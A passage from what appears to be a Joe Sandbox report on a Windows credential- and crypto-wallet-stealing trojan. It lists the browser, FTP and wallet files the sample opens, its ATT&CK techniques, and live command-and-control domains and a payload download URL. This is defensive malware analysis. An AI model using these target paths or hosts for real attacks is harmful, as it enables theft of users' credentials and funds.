          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 2136, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 2136, type: MEMORYSTR
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
          Windows Management Instrumentation
          1
          DLL Side-Loading
          2
          Process Injection
          1
          Masquerading
          2
          OS Credential Dumping
          1
          Query Registry
          Remote Services1
          Archive Collected Data
          11
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts2
          Command and Scripting Interpreter
          Boot or Logon Initialization Scripts1
          DLL Side-Loading
          41
          Disable or Modify Tools
          LSASS Memory761
          Security Software Discovery
          Remote Desktop Protocol41
          Data from Local System
          11
          Ingress Tool Transfer
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts1
          PowerShell
          Logon Script (Windows)2
          Bypass User Account Control
          361
          Virtualization/Sandbox Evasion
          Security Account Manager2
          Process Discovery
          SMB/Windows Admin SharesData from Network Shared Drive3
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
          Process Injection
          NTDS361
          Virtualization/Sandbox Evasion
          Distributed Component Object ModelInput Capture124
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information
          LSA Secrets1
          File and Directory Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
          Obfuscated Files or Information
          Cached Domain Credentials223
          System Information Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
          Software Packing
          DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          DLL Side-Loading
          Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
          Bypass User Account Control
          /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          file.exe42%ReversingLabsWin32.Trojan.Generic
          file.exe100%AviraTR/Crypt.TPM.Gen
          file.exe100%Joe Sandbox ML
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\0L9V49BGE9BOE4IYXIIV26RZIS7RT6.exe100%Joe Sandbox ML
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
          https://duckduckgo.com/ac/?q=0%URL Reputationsafe
          http://crl.microsoft0%URL Reputationsafe
          https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.0%URL Reputationsafe
          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
          http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
          https://www.ecosia.org/newtab/0%URL Reputationsafe
          https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg0%URL Reputationsafe
          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
          https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_0%URL Reputationsafe
          https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
          https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg0%URL Reputationsafe
          http://x1.c.lencr.org/00%URL Reputationsafe
          http://x1.i.lencr.org/00%URL Reputationsafe
          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
          http://crt.rootca1.amazontrust.com/rootca1.cer0?0%URL Reputationsafe
          https://support.mozilla.org/products/firefoxgro.all0%URL Reputationsafe
          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
          https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta0%URL Reputationsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          necklacedmny.store
          188.114.97.3
          truetrue
            unknown
            presticitpo.store
            unknown
            unknowntrue
              unknown
              thumbystriw.store
              unknown
              unknowntrue
                unknown
                crisiwarny.store
                unknown
                unknowntrue
                  unknown
                  fadehairucw.store
                  unknown
                  unknowntrue
                    unknown
                    NameMaliciousAntivirus DetectionReputation
                    https://necklacedmny.store/apitrue
                      unknown
                      presticitpo.storetrue
                        unknown
                        scriptyprefej.storetrue
                          unknown
                          necklacedmny.storetrue
                            unknown
                            fadehairucw.storetrue
                              unknown
                              navygenerayk.storetrue
                                unknown
                                founpiuer.storetrue
                                  unknown
                                  thumbystriw.storetrue
                                    unknown
                                    crisiwarny.storetrue
                                      unknown
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://duckduckgo.com/chrome_newtabfile.exe, 00000000.00000003.2156968333.0000000005BFE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157025323.0000000005BFC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157111169.0000000005BFC000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://necklacedmny.store:443/apiKfile.exe, 00000000.00000003.2185365736.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2185847364.00000000014FB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2204861781.00000000014F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2205217428.00000000014FB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2217026207.00000000014FB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2200728594.00000000014F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        http://185.215.113.16/off/def.exeINfile.exe, 00000000.00000003.2429181569.00000000014D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          https://duckduckgo.com/ac/?q=file.exe, 00000000.00000003.2156968333.0000000005BFE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157025323.0000000005BFC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157111169.0000000005BFC000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000000.00000003.2156968333.0000000005BFE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157025323.0000000005BFC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157111169.0000000005BFC000.00000004.00000800.00020000.00000000.sdmpfalse
                                            unknown
                                            http://crl.microsoftfile.exe, 00000000.00000003.2204926355.000000000147D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2217166199.000000000147D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2221222976.000000000147D000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.file.exe, 00000000.00000003.2187647503.0000000005BBC000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYifile.exe, 00000000.00000003.2187647503.0000000005BBC000.00000004.00000800.00020000.00000000.sdmpfalse
                                              unknown
                                              https://necklacedmny.store/r_file.exe, 00000000.00000003.2217103680.00000000014E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000003.2156968333.0000000005BFE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157025323.0000000005BFC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157111169.0000000005BFC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://necklacedmny.store/apiVfile.exe, 00000000.00000003.2429259759.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2429200041.00000000014C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  http://crl.rootca1.amazontrust.com/rootca1.crl0file.exe, 00000000.00000003.2186120112.0000000005BF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000000.00000003.2156968333.0000000005BFE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157025323.0000000005BFC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157111169.0000000005BFC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://185.215.113.16:80/off/def.exet7file.exe, 00000000.00000003.2429181569.00000000014D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    http://ocsp.rootca1.amazontrust.com0:file.exe, 00000000.00000003.2186120112.0000000005BF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://necklacedmny.store/:_file.exe, 00000000.00000003.2228791719.00000000014E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://www.ecosia.org/newtab/file.exe, 00000000.00000003.2156968333.0000000005BFE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157025323.0000000005BFC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157111169.0000000005BFC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpgfile.exe, 00000000.00000003.2187647503.0000000005BBC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfile.exe, 00000000.00000003.2187335901.0000000005CD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_file.exe, 00000000.00000003.2187647503.0000000005BBC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://necklacedmny.store/apiHfile.exe, 00000000.00000003.2228791719.00000000014EC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://ac.ecosia.org/autocomplete?q=file.exe, 00000000.00000003.2156968333.0000000005BFE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157025323.0000000005BFC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157111169.0000000005BFC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://185.215.113.16/file.exe, 00000000.00000003.2429259759.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2429200041.00000000014C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://necklacedmny.store/apiffile.exe, 00000000.00000003.2217166199.0000000001463000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2221222976.0000000001463000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2204926355.0000000001463000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://necklacedmny.store/file.exe, 00000000.00000003.2228791719.00000000014E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgfile.exe, 00000000.00000003.2187647503.0000000005BBC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://185.215.113.16:80/off/def.exefile.exefalse
                                                                  unknown
                                                                  http://x1.c.lencr.org/0file.exe, 00000000.00000003.2186120112.0000000005BF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://x1.i.lencr.org/0file.exe, 00000000.00000003.2186120112.0000000005BF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000003.2156968333.0000000005BFE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157025323.0000000005BFC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157111169.0000000005BFC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3file.exe, 00000000.00000003.2187647503.0000000005BBC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    http://crt.rootca1.amazontrust.com/rootca1.cer0?file.exe, 00000000.00000003.2186120112.0000000005BF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://185.215.113.16/off/def.exefile.exe, file.exe, 00000000.00000003.2429181569.00000000014D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000000.00000003.2187335901.0000000005CD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000000.00000003.2156968333.0000000005BFE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157025323.0000000005BFC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157111169.0000000005BFC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://www.mozilla.orfile.exe, 00000000.00000003.2187228610.0000000005BF5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&ctafile.exe, 00000000.00000003.2187647503.0000000005BBC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://necklacedmny.store:443/apifile.exe, file.exe, 00000000.00000003.2429181569.00000000014D8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2204861781.00000000014F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2205217428.00000000014FB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2217026207.00000000014FB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2200728594.00000000014F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs
                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          188.114.97.3
                                                                          necklacedmny.storeEuropean Union
                                                                          13335CLOUDFLARENETUStrue
                                                                          185.215.113.16
                                                                          unknownPortugal
                                                                          206894WHOLESALECONNECTIONSNLfalse
                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                          Analysis ID:1546394
                                                                          Start date and time:2024-10-31 20:48:05 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 6m 14s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:7
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:file.exe
                                                                          Detection:MAL
                                                                          Classification:mal100.troj.spyw.evad.winEXE@4/3@5/2
                                                                          EGA Information:
                                                                          • Successful, ratio: 50%
                                                                          HCA Information:Failed
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .exe
                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                          • Execution Graph export aborted for target file.exe, PID 2136 because there are no executed function
                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          • VT rate limit hit for: file.exe
                                                                          TimeTypeDescription
                                                                          15:48:56API Interceptor429x Sleep call for process: file.exe modified
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          188.114.97.318in SPA-198-2024.exeGet hashmaliciousFormBookBrowse
                                                                          • www.timizoasisey.shop/3p0l/
                                                                          lf1SPbZI3V.exeGet hashmaliciousLokibotBrowse
                                                                          • touxzw.ir/alpha2/five/fre.php
                                                                          Comprobante de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                          • paste.ee/d/vdlzo
                                                                          Purchase_Order_pdf.exeGet hashmaliciousFormBookBrowse
                                                                          • www.bayarcepat19.click/g48c/
                                                                          zxalphamn.docGet hashmaliciousLokibotBrowse
                                                                          • touxzw.ir/alpha2/five/fre.php
                                                                          rPO-000172483.exeGet hashmaliciousFormBookBrowse
                                                                          • www.launchdreamidea.xyz/2b9b/
                                                                          rPO_28102400.exeGet hashmaliciousLokibotBrowse
                                                                          • ghcopz.shop/ClarkB/PWS/fre.php
                                                                          PbfYaIvR5B.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                          • windowsxp.top/ExternaltoPhppollcpuupdateTrafficpublic.php
                                                                          SR3JZpolPo.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                                          • xilloolli.com/api.php?status=1&wallets=0&av=1
                                                                          5Z1WFRMTOXRH6X21Z8NU8.exeGet hashmaliciousUnknownBrowse
                                                                          • artvisions-autoinsider.com/8bkjdSdfjCe/index.php
                                                                          185.215.113.16file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                          • 185.215.113.16/mine/random.exe
                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                          • 185.215.113.16/test/num.exe
                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                          • 185.215.113.16/mine/random.exe
                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XWormBrowse
                                                                          • 185.215.113.16/off/def.exe
                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                          • 185.215.113.16/mine/random.exe
                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                          • 185.215.113.16/mine/random.exe
                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                          • 185.215.113.16/mine/random.exe
                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                          • 185.215.113.16/mine/random.exe
                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XWormBrowse
                                                                          • 185.215.113.16/off/def.exe
                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                          • 185.215.113.16/mine/random.exe
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          necklacedmny.storefile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                          • 188.114.96.3
                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                          • 188.114.96.3
                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                          • 188.114.97.3
